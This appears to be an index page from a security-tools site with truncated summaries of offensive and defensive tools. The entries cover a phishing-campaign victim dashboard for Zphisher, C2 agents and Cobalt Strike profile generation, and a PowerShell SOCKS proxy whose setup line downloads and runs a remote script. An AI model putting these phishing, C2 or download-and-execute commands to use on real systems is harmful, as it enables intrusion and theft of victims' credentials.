Zphisher-GUI-Back_office : A Zphisher GUI Back-Office Plugin
%20(1).png "Zphisher-GUI-Back_office : A Zphisher GUI Back-Office Plugin")
Zphisher-GUI-Back_office is a plugin where you can see in real time the victims of your phishing campaign, you just have to change the Zphisher files for these. Easy! This tool creates a graphical back office for the zphish tool (although it is not 100% necessary to use this tool, you can use these files by hosting it on a...
Tetanus : Mythic C2 Agent Targeting Linux And Windows Hosts Written In Rust
Tetanus is a Windows and Linux C2 agent written in rust. Installation To install Tetanus, you will need Mythic set up on a machine. In the Mythic root directory, use mythic-cli to install the agent. sudo ./mythic-cli install github https://github.com/MythicAgents/tetanussudo ./mythic-cli payload start tetanus Tetanus supports the http C2 profile: sudo ./mythic-cli install github https://github.com/MythicC2Profiles/httpsudo ./mythic-cli c2 start http Features Background job managementBuilt-in ssh clientConnect to a machine and download/upload files...
Octopus : Open Source Pre-Operation C2 Server Based On Python And Powershell
.png "Octopus : Open Source Pre-Operation C2 Server Based On Python And Powershell")
Octopus is an open source, pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S. The main purpose of creating Octopus is for use before any red team operation, where rather than starting the engagement with your full operational arsenal and infrastructure, you can use Octopus first to attack the target and gather information before...
Xepor : Web Routing Framework For Reverse Engineers And Security Researchers
.png "Xepor : Web Routing Framework For Reverse Engineers And Security Researchers")
Xepor (pronounced /ˈzɛfə/, zephyr), a web routing framework for reverse engineers and security researchers. It provides a Flask-like API for hackers to intercept and modify HTTP request and/or HTTP response in a human-friendly coding style. This project is meant to be used with mitmproxy. User write scripts with xepor, and run the script inside mitmproxy with mitmproxy -s your-script.py. If you want to step from PoC to production,...
C2concealer : Command Line Tool That Generates Randomized C2 Malleable Profiles For Use In Cobalt Strike
C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike. Installation chmod u+x install.sh./install.sh Building Docker Image docker build -t C2concealer . Running with Docker docker container run -it -v <cobalt_strike_location>:/usr/share/cobaltstrike/ C2concealer --hostname google.com --variant 3 Example Usage Usage:$ C2concealer --hostname google.com --variant 3Flags:(optional)--hostnameThe hostname used in HTTP client and server side settings. Default is None.--variantAn integer defining the number...
PowerProxy : PowerShell SOCKS Proxy With Reverse Proxy Capabilities
.png "PowerProxy : PowerShell SOCKS Proxy With Reverse Proxy Capabilities")
PowerProxy is a PowerShell SOCKS proxy with reverse proxy capabilities. PowerProxy is written with penetration testers in mind. Reverse proxy functionality is a priority, for traversing networks that block inbound connections. Reverse proxy connections are encrypted by default. Username/Password authentication is supported for Socks 5 connections. Setup Import the script: iex (new-object net.webclient).downloadstring("http://192.168.0.22/PowerProxy.ps1")ORImport-Module 192.168.0.22PublicPowerProxy.ps1 reverse_proxy_handler.py can create temporary SSL certs, which requires OpenSSL. If OpenSSL...
Cyph : Cryptographically Secure Messaging And Social Networking Service
Cyph is a cryptographically secure messaging and social networking service, providing an extreme level of privacy combined with best-in-class ease of use. Cyph’s patented technology — built by former SpaceX engineers, audited by Cure53, and the basis of research presentations at Black Hat and DEF CON — uniquely allows Cyph to solve the major security and usability limitations of conventional solutions. Commands available...
ShadowClone : Unleash The Power Of Cloud
ShadowClone is designed to delegate time consuming tasks to the cloud by distributing the input data to multiple serverless functions (AWS Lambda, Azure Functions etc.) and running the tasks in parallel resulting in huge performance boost! ShadowClone uses IBM's awesome Lithops library to distribute the workloads to serverless functions which is at the core of this tool. Effectively, it is...
Vaas Verdict-as-a-Service SDKs: Analyze Files For Malicious Content
VaaS (Verdict-as-a-Service) is a service that provides a platform for scanning files for malware and other threats. It allows easy integration in your application. With a few lines of code, you can start scanning files for malware. Integration of Malware Detection Easily integrate malware detection into any kind of application, service or platform. Create a command line scanner to find malware with a few...
BirDuster : A Multi Threaded Python Script Designed To Brute Force Directories
.png "BirDuster : A Multi Threaded Python Script Designed To Brute Force Directories")
BirDuster is a Python based knockoff of the original DirBuster. BirDuster is a multi threaded Python application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. Installation Use PIP: pip3 install --user BirDuster Clone source: git clone...
